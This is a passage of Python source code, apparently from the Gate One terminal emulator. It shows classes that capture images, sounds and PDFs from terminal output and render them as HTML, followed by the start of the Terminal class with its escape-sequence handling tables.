""" logging.debug('ImageFile.capture()') global _logged_pil_warning Image = False try: from PIL import Image except ImportError: if _logged_pil_warning: return _logged_pil_warning = True logging.warning(_( "Could not import the Python Imaging Library (PIL). " "Images will not be displayed in the terminal.")) logging.info(_( "TIP: Pillow is a 'friendly fork' of PIL that has been updated " "to work with Python 3 (also works in Python 2.X). You can " "install it with: pip install --upgrade pillow")) return # No PIL means no images. Don't bother wasting memory. if _logged_pil_warning: _logged_pil_warning = False logging.info(_( "Good job installing PIL! Terminal image suppport has been " "re-enabled. Aren't dynamic imports grand?")) #open('/tmp/lastimage.img', 'w').write(data) # Use for debug # Image file formats don't usually like carriage returns: data = data.replace(b'\r\n', b'\n') # shell adds an extra /r i = BytesIO(data) try: im = Image.open(i) except (AttributeError, IOError) as e: # i.e. PIL couldn't identify the file message = _("PIL couldn't process the image (%s)" % e) logging.error(message) term_instance.send_message(message) return # Don't do anything--bad image # Save a copy of the data so the user can have access to the original if self.path: if os.path.exists(self.path): if os.path.isdir(self.path): self.original_file = tempfile.NamedTemporaryFile( suffix=self.suffix, dir=self.path) self.original_file.write(data) self.original_file.flush() self.original_file.seek(0) # Just in case # Resize the image to be small enough to fit within a typical terminal if im.size[0] > 640 or im.size[1] > 480: im.thumbnail((640, 480), Image.ANTIALIAS) # Get the current image location and reference so we can move it around img_Y = term_instance.cursorY img_X = term_instance.cursorX ref = term_instance.screen[img_Y][img_X] if term_instance.em_dimensions: # Make sure the image will fit properly in the screen width = im.size[0] height = im.size[1] if height <= term_instance.em_dimensions['height']: # Fits within a line. No need for a newline num_chars = int(width/term_instance.em_dimensions['width']) # Move the cursor an equivalent number of characters term_instance.cursor_right(num_chars) else: # This is how many newlines the image represents: newlines = int(height/term_instance.em_dimensions['height']) term_instance.screen[img_Y][img_X] = u' ' # Empty old location term_instance.cursorX = 0 term_instance.newline() # Start with a newline if newlines > term_instance.cursorY: # Shift empty lines at the bottom to the top to kinda sorta # make room for the images so the user doesn't have to # scroll (hey, it works!) for i in xrange(newlines): line = term_instance.screen.pop() rendition = term_instance.renditions.pop() term_instance.screen.insert(0, line) term_instance.renditions.insert(0, rendition) if term_instance.cursorY < (term_instance.rows - 1): term_instance.cursorY += 1 # Save the new image location term_instance.screen[ term_instance.cursorY][term_instance.cursorX] = ref term_instance.newline() # Follow-up newline elif term_instance.em_dimensions == None: # No way to calculate the number of lines the image will take term_instance.screen[img_Y][img_X] = u' ' # Empty old location term_instance.cursorY = term_instance.rows - 1 # Move to the end # ... 
so it doesn't get cut off at the top # Save the new image location term_instance.screen[ term_instance.cursorY][term_instance.cursorX] = ref # Make some space at the bottom too just in case term_instance.newline() term_instance.newline() else: # When em_dimensions are set to 0 assume the user intentionally # wants things to be sized as inline as possible. term_instance.newline() # Write the captured image to disk if self.path: if os.path.exists(self.path): if os.path.isdir(self.path): # Assume that a path was given for a reason and use a # NamedTemporaryFile instead of TemporaryFile. self.file_obj = tempfile.NamedTemporaryFile( suffix=self.suffix, dir=self.path) # Update self.path to use the new, actual file path self.path = self.file_obj.name else: self.file_obj = open(self.path, 'rb+') else: self.file_obj = tempfile.TemporaryFile(suffix=self.suffix) try: im.save(self.file_obj, im.format) except (AttributeError, IOError): # PIL was compiled without (complete) support for this format logging.error(_( "PIL is missing support for this image type (%s). You probably" " need to install zlib-devel and libjpeg-devel then re-install " "it with 'pip install --upgrade PIL' or 'pip install " "--upgrade Pillow'" % self.name)) try: self.file_obj.close() # Can't do anything with it except AttributeError: pass # File was probably just never opened/saved properly return None self.file_obj.flush() self.file_obj.seek(0) # Go back to the start return self.file_obj def html(self): """ Returns :attr:`self.file_obj` as an <img> tag with the src set to a data::URI. """ try: from PIL import Image except ImportError: return # Warnings will have already been printed by this point if not self.file_obj: return u"" self.file_obj.seek(0) try: im = Image.open(self.file_obj) except IOError: # i.e. PIL couldn't identify the file return u"<i>Error displaying image</i>" self.file_obj.seek(0) # Need to encode base64 to create a data URI encoded = base64.b64encode(self.file_obj.read()) data_uri = "data:image/{type};base64,{encoded}".format( type=im.format.lower(), encoded=encoded.decode('utf-8')) link = "%s/%s" % (self.linkpath, os.path.split(self.path)[1]) if self.original_file: link = "%s/%s" % ( self.linkpath, os.path.split(self.original_file.name)[1]) if self.thumbnail: return self.html_icon_template.format( link=link, src=data_uri, width=im.size[0], height=im.size[1]) return self.html_template.format( link=link, src=data_uri, width=im.size[0], height=im.size[1]) class PNGFile(ImageFile): """ An override of :class:`ImageFile` for PNGs to hard-code the name, regular expressions, mimetype, and suffix. """ name = _("PNG Image") mimetype = "image/png" suffix = ".png" re_header = re.compile(b'.*\x89PNG\r', re.DOTALL) re_capture = re.compile(b'(\x89PNG\r.+?IEND\xaeB`\x82)', re.DOTALL) html_template = ( '<a target="_blank" href="{link}" ' 'title="Click to open the original file in a new window (full size)">' '<img src="{src}" width="{width}" height="{height}">' '</a>' ) def __init__(self, path="", linkpath="", **kwargs): """ **path:** (optional) The path to a file or directory where the file should be stored. If *path* is a directory a random filename will be chosen. """ self.path = path self.linkpath = linkpath self.file_obj = None # Images will be displayed inline so no icons unless overridden: self.html_icon_template = self.html_template class JPEGFile(ImageFile): """ An override of :class:`ImageFile` for JPEGs to hard-code the name, regular expressions, mimetype, and suffix. 
""" name = _("JPEG Image") mimetype = "image/jpeg" suffix = ".jpeg" re_header = re.compile( b'.*\xff\xd8\xff.+JFIF\x00|.*\xff\xd8\xff.+Exif\x00', re.DOTALL) re_capture = re.compile(b'(\xff\xd8\xff.+?\xff\xd9)', re.DOTALL) html_template = ( '<a target="_blank" href="{link}" ' 'title="Click to open the original file in a new window (full size)">' '<img src="{src}" width="{width}" height="{height}">' '</a>' ) def __init__(self, path="", linkpath="", **kwargs): """ **path:** (optional) The path to a file or directory where the file should be stored. If *path* is a directory a random filename will be chosen. """ self.path = path self.linkpath = linkpath self.file_obj = None # Images will be displayed inline so no icons unless overridden: self.html_icon_template = self.html_template class SoundFile(FileType): """ A subclass of :class:`FileType` for sound files (e.g. .wav). Overrides :meth:`self.html` and :meth:`self.capture`. """ # NOTE: I disabled autoplay on these sounds because it causes the browser to # play back the sound with every screen update! Press return a few times # and the sound will play a few times; annoying! html_template = ( '<audio controls>' '<source src="{src}" type="{mimetype}">' 'Your browser does not support this audio format.' '</audio>' ) display_metadata = None # Can be overridden to send a message to the user def capture(self, data, term_instance): """ Captures the sound contained within *data*. Will use *term_instance* to make room for the embedded sound control in the terminal screen. .. note:: Unlike :class:`FileType`, *term_instance* is mandatory. """ logging.debug('SoundFile.capture()') # Fix any carriage returns (generated by the shell): data = data.replace(b'\r\n', b'\n') # Make some room for the audio controls: term_instance.newline() # Write the captured image to disk if self.path: if os.path.exists(self.path): if os.path.isdir(self.path): # Assume that a path was given for a reason and use a # NamedTemporaryFile instead of TemporaryFile. self.file_obj = tempfile.NamedTemporaryFile( suffix=self.suffix, dir=self.path) # Update self.path to use the new, actual file path self.path = self.file_obj.name else: self.file_obj = open(self.path, 'rb+') else: self.file_obj = tempfile.TemporaryFile(suffix=self.suffix) self.file_obj.write(data) self.file_obj.flush() self.file_obj.seek(0) # Go back to the start if self.display_metadata: self.display_metadata(term_instance) return self.file_obj def html(self): """ Returns :attr:`self.file_obj` as an <img> tag with the src set to a data::URI. """ if not self.file_obj: return u"" self.file_obj.seek(0) # Need to encode base64 to create a data URI encoded = base64.b64encode(self.file_obj.read()) data_uri = "data:{mimetype};base64,{encoded}".format( mimetype=self.mimetype, encoded=encoded.decode('utf-8')) link = "%s/%s" % (self.linkpath, os.path.split(self.path)[1]) if self.original_file: link = "%s/%s" % ( self.linkpath, os.path.split(self.original_file.name)[1]) if self.thumbnail: return self.html_icon_template.format( link=link, src=data_uri, icon=self.thumbnail, mimetype=self.mimetype) return self.html_template.format( link=link, src=data_uri, mimetype=self.mimetype) class WAVFile(SoundFile): """ An override of :class:`SoundFile` for WAVs to hard-code the name, regular expressions, mimetype, and suffix. Also, a :func:`helper` function is provided that adjusts the `self.re_capture` regex so that it precisely matches the WAV file being captured. 
""" name = _("WAV Sound") mimetype = "audio/x-wav" suffix = ".wav" re_header = re.compile(b'RIFF....WAVEfmt', re.DOTALL) re_capture = re.compile(b'(RIFF....WAVEfmt.+?\r\n)', re.DOTALL) re_wav_header = re.compile(b'(RIFF.{40})', re.DOTALL) def __init__(self, path="", linkpath="", **kwargs): """ **path:** (optional) The path to a file or directory where the file should be stored. If *path* is a directory a random filename will be chosen. """ self.path = path self.linkpath = linkpath self.file_obj = None self.sent_message = False # Sounds will be displayed inline so no icons unless overridden: self.html_icon_template = self.html_template def helper(self, term_instance): """ Called at the start of a WAV file capture. Calculates the length of the file and modifies `self.re_capture` with laser precision. """ data = term_instance.capture self.wav_header = struct.unpack( '4si4s4sihhiihh4si', self.re_wav_header.match(data).group()) self.wav_length = self.wav_header[1] + 8 if not self.sent_message: channels = "mono" if self.wav_header[6] == 2: channels = "stereo" if self.wav_length != self.wav_header[12] + 44: # Corrupt WAV file message = _("WAV File is corrupted: Header data mismatch.") term_instance.send_message(message) term_instance.cancel_capture = True message = _("WAV File: %skHz (%s)" % (self.wav_header[7], channels)) term_instance.send_message(message) self.sent_message = True # Update the capture regex with laser precision: self.re_capture = re.compile( b'(RIFF....WAVE.{%s})' % (self.wav_length-12), re.DOTALL) class OGGFile(SoundFile): """ An override of :class:`SoundFile` for OGGs to hard-code the name, regular expressions, mimetype, and suffix. """ name = _("OGG Sound") mimetype = "audio/ogg" suffix = ".ogg" # NOTE: \x02 below marks "start of stream" (\x04 is "end of stream") re_header = re.compile(b'OggS\x00\x02', re.DOTALL) # NOTE: This should never actually match since it will be replaced by the # helper() function: re_capture = re.compile(b'(OggS\x00\x02.+OggS\x00\x04\r\n)', re.DOTALL) re_ogg_header = re.compile(b'(OggS\x00\x02.{21})', re.DOTALL) re_last_segment = re.compile(b'(OggS\x00\x04.{21})', re.DOTALL) def __init__(self, path="", linkpath="", **kwargs): """ **path:** (optional) The path to a file or directory where the file should be stored. If *path* is a directory a random filename will be chosen. """ self.path = path self.linkpath = linkpath self.file_obj = None self.sent_message = False # Sounds will be displayed inline so no icons unless overridden: self.html_icon_template = self.html_template def helper(self, term_instance): """ Called at the start of a OGG file capture. Calculates the length of the file and modifies `self.re_capture` with laser precision. Returns `True` if the entire ogg has been captured. """ data = term_instance.capture last_segment_header = self.re_last_segment.search(data) if not last_segment_header: #print("No last segment header yet") #print(repr(data.split('OggS')[-1])) #print('-----------------------------') return # Haven't reached the end of the OGG yet else: last_segment_header = last_segment_header.group() # This decodes the OGG page header (oggs, version, type_flags, position, serial, sequence, crc, segments) = struct.unpack( "<4sBBqIIiB", last_segment_header) # Figuring out the length of the last set of segments is a little bit # involved... 
lacing_size = 0 lacings = [] last_segment_header = re.search( # Include the segment table b'(OggS\x00\x04.{%s})' % (21+segments), data, re.DOTALL).group() lacing_bytes = last_segment_header[27:][:segments] for c in map(ord, lacing_bytes): lacing_size += c if c < 255: lacings.append(lacing_size) lacing_size = 0 segment_size = 27 # Initial header size segment_size += sum(ord(e) for e in last_segment_header[27:]) segment_size += len(lacings) # Update the capture regex with laser precision: self.re_capture = re.compile( b'(OggS\x00\x02\x00.+OggS\x00\x04..{%s})' % (segment_size), re.DOTALL) return True def display_metadata(self, term_instance): """ Sends a message to the user that displays the OGG file metadata. Things like ID3 tags, bitrate, channels, etc. """ if not self.sent_message: global _logged_mutagen_warning try: import mutagen.oggvorbis except ImportError: if not _logged_mutagen_warning: _logged_mutagen_warning = True logging.warning(_( "Could not import the mutagen Python module. " "Displaying audio file metadata will be disabled.")) logging.info(_( "TIP: Install mutagen: sudo pip install mutagen")) return oggfile = mutagen.oggvorbis.Open(self.file_obj.name) message = "<pre>%s</pre>" % oggfile.pprint() term_instance.send_message(message) self.sent_message = True class PDFFile(FileType): """ A subclass of :class:`FileType` for PDFs (specifically to override :meth:`self.html`). Has hard-coded name, mimetype, suffix, and regular expressions. This class will also utilize :attr:`self.icondir` to look for an icon named, 'pdf.svg'. If found it will be utilized by :meth:`self.html` when generating output. """ name = _("PDF Document") mimetype = "application/pdf" suffix = ".pdf" re_header = re.compile(br'.*%PDF-[0-9]\.[0-9]{1,2}.+?obj', re.DOTALL) re_capture = re.compile(br'(%PDF-[0-9]\.[0-9]{1,2}.+%%EOF)', re.DOTALL) icon = "pdf.svg" # Name of the file inside of self.icondir # NOTE: Using two separate links below so the whitespace doesn't end up # underlined. Looks much nicer this way. html_icon_template = ( '<span class="pdfcontainer"><a class="pdflink" target="_blank" ' 'href="{link}">{icon}</a><br>' ' <a class="pdflink" href="{link}">{name}</a></span>') html_template = ( '<span class="pdfcontainer"><a target="_blank" href="{link}">{name}</a>' '</span>') is_container = True def __init__(self, path="", linkpath="", icondir=None): """ **path:** (optional) The path to the file. **linkpath:** (optional) The path to use when generating a link in HTML output. **icondir:** (optional) A path to look for a relevant icon to display when generating HTML output. """ self.path = path self.linkpath = linkpath self.icondir = icondir self.file_obj = None self.thumbnail = None def generate_thumbnail(self): """ If available, will use ghostscript (gs) to generate a thumbnail of this PDF in the form of an <img> tag with the src set to a data::URI. 
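
        .. note:: Relies on ``getstatusoutput``, which lives in the `commands`
            module on Python 2 and in `subprocess` on Python 3.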
""" from commands import getstatusoutput thumb = tempfile.NamedTemporaryFile() params = [ 'gs', # gs must be in your path '-dPDFFitPage', '-dPARANOIDSAFER', '-dBATCH', '-dNOPAUSE', '-dNOPROMPT', '-dMaxBitmap=500000000', '-dAlignToPixels=0', '-dGridFitTT=0', '-dDEVICEWIDTH=90', '-dDEVICEHEIGHT=120', '-dORIENT1=true', '-sDEVICE=jpeg', '-dTextAlphaBits=4', '-dGraphicsAlphaBits=4', '-sOutputFile=%s' % thumb.name, self.path ] retcode, output = getstatusoutput(" ".join(params)) if retcode == 0: # Success data = None with open(thumb.name) as f: data = f.read() thumb.close() # Make sure it gets removed now we've read it if data: encoded = base64.b64encode(data) data_uri = "data:image/jpeg;base64,%s" % encoded.decode('utf-8') return '<img src="%s">' % data_uri def capture(self, data, term_instance): """ Stores *data* as a temporary file and returns that file's object. *term_instance* can be used by overrides of this function to make adjustments to the terminal emulator after the *data* is captured e.g. to make room for an image. """ logging.debug("PDFFile.capture()") # Remove the extra \r's that the terminal adds: data = data.replace(b'\r\n', b'\n') # Write the data to disk in a temporary location if self.path: if os.path.exists(self.path): if os.path.isdir(self.path): # Assume that a path was given for a reason and use a # NamedTemporaryFile instead of TemporaryFile. self.file_obj = tempfile.NamedTemporaryFile( suffix=self.suffix, dir=self.path) # Update self.path to use the new, actual file path self.path = self.file_obj.name else: self.file_obj = open(self.path, 'rb+') else: # Use the terminal emulator's temppath self.file_obj = tempfile.NamedTemporaryFile( suffix=self.suffix, dir=term_instance.temppath) self.path = self.file_obj.name self.file_obj.write(data) self.file_obj.flush() # Ghostscript-based thumbnail generation disabled due to its slow, # blocking nature. Works great though! #self.thumbnail = self.generate_thumbnail() # TODO: Figure out a way to do non-blocking thumbnail generation if self.icondir: pdf_icon = os.path.join(self.icondir, self.icon) if os.path.exists(pdf_icon): with open(pdf_icon) as f: self.thumbnail = f.read() if self.thumbnail: # Make room for our link img_Y = term_instance.cursorY img_X = term_instance.cursorX ref = term_instance.screen[img_Y][img_X] term_instance.screen[img_Y][img_X] = u' ' # No longer at this loc if term_instance.cursorY < 8: # Icons are about ~8 newlines high for line in xrange(8 - term_instance.cursorY): term_instance.newline() # Save the new location term_instance.screen[ term_instance.cursorY][term_instance.cursorX] = ref term_instance.newline() else: # Make room for the characters in the name, "PDF Document" for i in xrange(len(self.name)): term_instance.screen[term_instance.cursorY].pop() # Leave it open return self.file_obj def html(self): """ Returns a link to download the PDF using :attr:`self.linkpath` for the href attribute. Will use :attr:`self.html_icon_template` if :attr:`self.icon` can be found. Otherwise it will just output :attr:`self.name` as a clickable link. """ link = "%s/%s" % (self.linkpath, os.path.split(self.path)[1]) if self.thumbnail: return self.html_icon_template.format( link=link, icon=self.thumbnail, name=self.name) return self.html_template.format( link=link, icon=self.thumbnail, name=self.name) class NotFoundError(Exception): """ Raised by :meth:`Terminal.remove_magic` if a given filetype was not found in :attr:`Terminal.supported_magic`. """ pass class Terminal(object): """ Terminal controller class. 
    ASCII_NUL = 0    # Null
    ASCII_BEL = 7    # Bell (BEL)
    ASCII_BS = 8     # Backspace
    ASCII_HT = 9     # Horizontal Tab
    ASCII_LF = 10    # Line Feed
    ASCII_VT = 11    # Vertical Tab
    ASCII_FF = 12    # Form Feed
    ASCII_CR = 13    # Carriage Return
    ASCII_SO = 14    # Ctrl-N; Shift out (switches to the G1 charset)
    ASCII_SI = 15    # Ctrl-O; Shift in (switches to the G0 charset)
    ASCII_XON = 17   # Resume Transmission
    ASCII_XOFF = 19  # Stop Transmission or Ignore Characters
    ASCII_CAN = 24   # Cancel Escape Sequence
    ASCII_SUB = 26   # Substitute: Cancel Escape Sequence and replace with ?
    ASCII_ESC = 27   # Escape
    ASCII_CSI = 155  # Control Sequence Introducer (that nothing uses)
    ASCII_HTS = 210  # Horizontal Tab Stop (HTS)

    class_prefix = u'✈' # Prefix used with HTML output span class names
                        # (to avoid namespace conflicts)
    charsets = {
        'B': {}, # Default is USA (aka 'B')
        '0': { # Line drawing mode
            95: u' ',
            96: u'◆',
            97: u'▒',
            98: u'\t',
            99: u'\x0c',
            100: u'\r',
            101: u'\n',
            102: u'°',
            103: u'±',
            104: u'\n',
            105: u'\x0b',
            106: u'┘',
            107: u'┐',
            108: u'┌',
            109: u'└',
            110: u'┼',
            111: u'⎺', # All these bars and not a drink!
            112: u'⎻',
            113: u'─',
            114: u'⎼',
            115: u'⎽',
            116: u'├',
            117: u'┤',
            118: u'┴',
            119: u'┬',
            120: u'│',
            121: u'≤',
            122: u'≥',
            123: u'π',
            124: u'≠',
            125: u'£',
            126: u'·' # Centered dot--who comes up with this stuff?!?
        }
    }
    RE_CSI_ESC_SEQ = re.compile(r'\x1B\[([?A-Za-z0-9>;@:\!]*?)([A-Za-z@_])')
    RE_ESC_SEQ = re.compile(
        r'\x1b(.*\x1b\\|[ABCDEFGHIJKLMNOQRSTUVWXYZa-z0-9=<>]|[()# %*+].)')
    RE_TITLE_SEQ = re.compile(r'\x1b\][0-2]\;(.*?)(\x07|\x1b\\)')
    # The below regex is used to match our optional (non-standard) handler
    RE_OPT_SEQ = re.compile(r'\x1b\]_\;(.+?)(\x07|\x1b\\)')
    RE_NUMBERS = re.compile(r'\d*') # Matches any number
    RE_SIGINT = re.compile(br'.*\^C', re.MULTILINE|re.DOTALL)
    def __init__(self, rows=24, cols=80, em_dimensions=None,
            temppath='/tmp', linkpath='/tmp', icondir=None, encoding='utf-8',
            async=None, # NOTE: 'async' became a reserved word in Python 3.7
            debug=False, enabled_filetypes="all"):
        """
        Initializes the terminal by calling *self.initialize(rows, cols)*.
        This is so we can have an equivalent function in situations where
        __init__() gets overridden.

        If *em_dimensions* are provided they will be used to determine how
        many lines images will take when they're drawn in the terminal.  This
        is to prevent images that are written to the top of the screen from
        having their tops cut off.  *em_dimensions* must be a dict in the form
        of::

            {'height': <px>, 'width': <px>}

        The *temppath* will be used to store files that are captured/saved by
        the terminal emulator.  In conjunction with this is the *linkpath*
        which will be used when creating links to these temporary files.  For
        example, a web-based application may wish to have the terminal
        emulator store temporary files in /tmp but give clients a completely
        unrelated URL to retrieve these files (for security or convenience
        reasons).  Here's a real world example of how it works::

            >>> term = Terminal(
            ...     rows=10, cols=40, temppath='/var/tmp', linkpath='/terminal')
            >>> term.write('About to write a PDF\\n')
            >>> pdf = open('/path/to/somefile.pdf').read()
            >>> term.write(pdf)
            >>> term.dump_html()
            ([u'About to write a PDF ',
            # <unnecessary lines of whitespace have been removed for this example>
            u'<a target="_blank" href="/terminal/tmpZoOKVM.pdf">PDF Document</a>'])

        The PDF file in question will reside in `/var/tmp` but the link was
        created as `href="/terminal/tmpZoOKVM.pdf"`.  As long as your web app
        knows to look in /var/tmp for incoming '/terminal' requests users
        should be able to retrieve their documents:
http://yourapp.company.com/terminal/tmpZoOKVM.pdf The *icondir* parameter, if given, will be used to provide a relevant icon when outputing a link to a file. When a supported :class:`FileType` is captured the instance will be given the *icondir* as a parameter in a manner similar to this:: filetype_instance = filetype_class(icondir=self.icondir) That way when filetype_instance.html() is called it can display a nice icon to the user... if that particular :class:`FileType` supports icons and the icon it is looking for happens to be available at *icondir*. If *debug* is True, the root logger will have its level set to DEBUG. If *enabled_filetypes* are given (iterable of strings or `FileType` classes) the provided file types will be enabled for this terminal. If not given it will default to enabling 'all' file types. To disable support for all file types simply pass ``None``, ``False``, or an empty list. """ if rows < 2 or cols < 2: raise InvalidParameters(_( "Invalid value(s) given for rows ({rows}) and/or cols " "({cols}). Both must be > 1.").format(rows=rows, cols=cols)) if em_dimensions: if not isinstance(em_dimensions, dict): raise InvalidParameters(_( "The em_dimensions keyword argument must be a dict. " "Here's what was given instead: {0}").format( repr(em_dimensions))) if 'width' not in em_dimensions or 'height' not in em_dimensions: raise InvalidParameters(_( "The given em_dimensions dict ({0}) is missing either " "'height' or 'width'").format(repr(em_dimensions))) if not os.path.exists(temppath): raise InvalidParameters(_( "The given temppath ({0}) does not exist.").format(temppath)) if icondir: if not os.path.exists(icondir): logging.warning(_( "The given icondir ({0}) does not exist.").format(icondir)) if debug: logger = logging.getLogger() logger.level = logging.DEBUG self.temppath = temppath self.linkpath = linkpath self.icondir = icondir self.encoding = encoding self.async = async if enabled_filetypes == "all": enabled_filetypes = [ PDFFile, PNGFile, JPEGFile, WAVFile, OGGFile, ] elif enabled_filetypes: for i, filetype in enumerate(list(enabled_filetypes)): if isinstance(filetype, basestring): # Attempt to convert into a proper class with Python voodoo _class = globals().get(filetype) if _class: enabled_filetypes[i] = _class # Update in-place else: enabled_filetypes = [] self.enabled_filetypes = enabled_filetypes # This controls how often we send a message to the client when capturing # a special file type. The default is to update the user of progress # once every 1.5 seconds. self.message_interval = timedelta(seconds=1.5) self.notified = False # Used to tell if we have notified the user before self.cancel_capture = False # Used by cursor_left() and cursor_right() to handle double-width chars: self.double_width_right = False self.double_width_left = False self.prev_char = u'' self.max_scrollback = 1000 # Max number of lines kept in the buffer self.initialize(rows, cols, em_dimensions) def initialize(self, rows=24, cols=80, em_dimensions=None): """ Initializes the terminal (the actual equivalent to :meth:`__init__`). """ self.cols = cols self.rows = rows self.em_dimensions = em_dimensions self.scrollback_buf = [] self.scrollback_renditions = [] self.title = "Gate One" # This variable can be referenced by programs implementing Terminal() to # determine if anything has changed since the last dump*() self.modified = False self.local_echo = True self.insert_mode = False self.esc_buffer = '' # For holding escape sequences as they're typed. 
self.cursor_home = 0 self.cur_rendition = unichr(1000) # Should always be reset ([0]) self.init_screen() self.init_renditions() self.current_charset = 0 self.set_G0_charset('B') self.set_G1_charset('B') self.use_g0_charset() # Set the default window margins self.top_margin = 0 self.bottom_margin = self.rows - 1 self.timeout_capture = None self.specials = { self.ASCII_NUL: self.__ignore, self.ASCII_BEL: self.bell, self.ASCII_BS: self.backspace, self.ASCII_HT: self.horizontal_tab, self.ASCII_LF: self.newline, self.ASCII_VT: self.newline, self.ASCII_FF: self.newline, self.ASCII_CR: self.carriage_return, self.ASCII_SO: self.use_g1_charset, self.ASCII_SI: self.use_g0_charset, self.ASCII_XON: self._xon, self.ASCII_CAN: self._cancel_esc_sequence, self.ASCII_XOFF: self._xoff, #self.ASCII_ESC: self._sub_esc_sequence, self.ASCII_ESC: self._escape, self.ASCII_CSI: self._csi, } self.esc_handlers = { # TODO: Make a different set of these for each respective emulation mode (VT-52, VT-100, VT-200, etc etc) '#': self._set_line_params, # Varies '\\': self._string_terminator, # ST 'c': self.clear_screen, # Reset terminal 'D': self.__ignore, # Move/scroll window up one line IND 'M': self.reverse_linefeed, # Move/scroll window down one line RI 'E': self.next_line, # Move to next line NEL 'F': self.__ignore, # Enter Graphics Mode 'G': self.next_line, # Exit Graphics Mode '6': self._dsr_get_cursor_position, # Get cursor position DSR '7': self.save_cursor_position, # Save cursor position and attributes DECSC '8': self.restore_cursor_position, # Restore cursor position and attributes DECSC 'H': self._set_tabstop, # Set a tab at the current column HTS 'I': self.reverse_linefeed, '(': self.set_G0_charset, # Designate G0 Character Set ')': self.set_G1_charset, # Designate G1 Character Set 'N': self.__ignore, # Set single shift 2 SS2 'O': self.__ignore, # Set single shift 3 SS3 '5': self._device_status_report, # Request: Device status report DSR '0': self.__ignore, # Response: terminal is OK DSR 'P': self._dcs_handler, # Device Control String DCS # NOTE: = and > are ignored because the user can override/control # them via the numlock key on their keyboard. To do otherwise would # just confuse people. '=': self.__ignore, # Application Keypad DECPAM '>': self.__ignore, # Exit alternate keypad mode '<': self.__ignore, # Exit VT-52 mode 'Z': self._csi_device_identification, } self.csi_handlers = { 'A': self.cursor_up, 'B': self.cursor_down, 'C': self.cursor_right, 'D': self.cursor_left, 'E': self.cursor_next_line, # NOTE: Not the same as next_line() 'F': self.cursor_previous_line, 'G': self.cursor_horizontal_absolute, 'H': self.cursor_position, 'L': self.insert_line, 'M': self.delete_line, #'b': self.repeat_last_char, # TODO 'c': self._csi_device_identification, # Device status report (DSR) 'g': self.__ignore, # TODO: Tab clear 'h': self.set_expanded_mode, 'i': self.__ignore, # ESC[5i is "redirect to printer", ESC[4i ends it 'l': self.reset_expanded_mode, 'f': self.cursor_position, 'd': self.cursor_position_vertical, # Vertical Line Position Absolute (VPA) #'e': self.cursor_position_vertical_relative, # VPR TODO 'J': self.clear_screen_from_cursor, 'K': self.clear_line_from_cursor, 'S': self.scroll_up, 'T': self.scroll_down, 's': self.save_cursor_position, 'u': self.restore_cursor_position, 'm': self._set_rendition, 'n': self._csi_device_status_report, # <ESC>[6n is the only one I know of (request cursor position) 'p': self.reset, # TODO: "!p" is "Soft terminal reset". 
Also, "Set conformance level" (VT100, VT200, or VT300) 'r': self._set_top_bottom, # DECSTBM (used by many apps) 'q': self.set_led_state, # Seems a bit silly but you never know 'P': self.delete_characters, # DCH Deletes the specified number of chars 'X': self._erase_characters, # ECH Same as DCH but also deletes renditions 'Z': self.insert_characters, # Inserts the specified number of chars '@': self.insert_characters, # Inserts the specified number of chars #'`': self._char_position_row, # Position cursor (row only) #'t': self.window_manipulation, # TODO #'z': self.locator, # TODO: DECELR "Enable locator reporting" } # Used to store what expanded modes are active self.expanded_modes = { # Important defaults '1': False, # Application Cursor Keys '7': False, # Autowrap '25': True, # Show Cursor } self.expanded_mode_handlers = { # Expanded modes take a True/False argument for set/reset '1': partial(self.expanded_mode_toggle, '1'), '2': self.__ignore, # DECANM and set VT100 mode (and lock keyboard) '3': self.__ignore, # 132 Column Mode (DECCOLM) '4': self.__ignore, # Smooth (Slow) Scroll (DECSCLM) '5': self.__ignore, # Reverse video (might support in future) '6': self.__ignore, # Origin Mode (DECOM) # Wraparound Mode (DECAWM): '7': partial(self.expanded_mode_toggle, '7'), '8': self.__ignore, # Auto-repeat Keys (DECARM) # Send Mouse X & Y on button press: '9': partial(self.expanded_mode_toggle, '9'), '12': self.__ignore, # SRM or Start Blinking Cursor (att610) '18': self.__ignore, # Print form feed (DECPFF) '19': self.__ignore, # Set print extent to full screen (DECPEX) '25': partial(self.expanded_mode_toggle, '25'), '38': self.__ignore, # Enter Tektronix Mode (DECTEK) '41': self.__ignore, # more(1) fix (whatever that is) '42': self.__ignore, # Enable Nation Replacement Character sets (DECNRCM) '44': self.__ignore, # Turn On Margin Bell '45': self.__ignore, # Reverse-wraparound Mode '46': self.__ignore, # Start Logging '47': self.toggle_alternate_screen_buffer, # Use Alternate Screen Buffer '66': self.__ignore, # Application keypad (DECNKM) '67': self.__ignore, # Backarrow key sends delete (DECBKM) # Send Mouse X/Y on button press and release: '1000': partial(self.expanded_mode_toggle, '1000'), # Use Hilite Mouse Tracking: '1001': partial(self.expanded_mode_toggle, '1001'), # Use Cell Motion Mouse Tracking: '1002': partial(self.expanded_mode_toggle, '1002'), # Use All Motion Mouse Tracking: '1003': partial(self.expanded_mode_toggle, '1003'), # Send FocusIn/FocusOut events: '1004': partial(self.expanded_mode_toggle, '1004'), # Enable UTF-8 Mouse Mode: '1005': partial(self.expanded_mode_toggle, '1005'), # Enable SGR Mouse Mode: '1006': partial(self.expanded_mode_toggle, '1006'), '1010': self.__ignore, # Scroll to bottom on tty output '1011': self.__ignore, # Scroll to bottom on key press '1035': self.__ignore, # Enable special modifiers for Alt and NumLock keys '1036': self.__ignore, # Send ESC when Meta modifies a key '1037': self.__ignore, # Send DEL from the editing-keypad Delete key '1047': self.__ignore, # Use Alternate Screen Buffer '1048': self.__ignore, # Save cursor as in DECSC # Save cursor as in DECSC and use Alternate Screen Buffer, # clearing it first: '1049': self.toggle_alternate_screen_buffer_cursor, '1051': self.__ignore, # Set Sun function-key mode '1052': self.__ignore, # Set HP function-key mode '1060': self.__ignore, # Set legacy keyboard emulation (X11R6) '1061': self.__ignore, # Set Sun/PC keyboard emulation of VT220 keyboard } self.callbacks = { CALLBACK_SCROLL_UP: {}, 
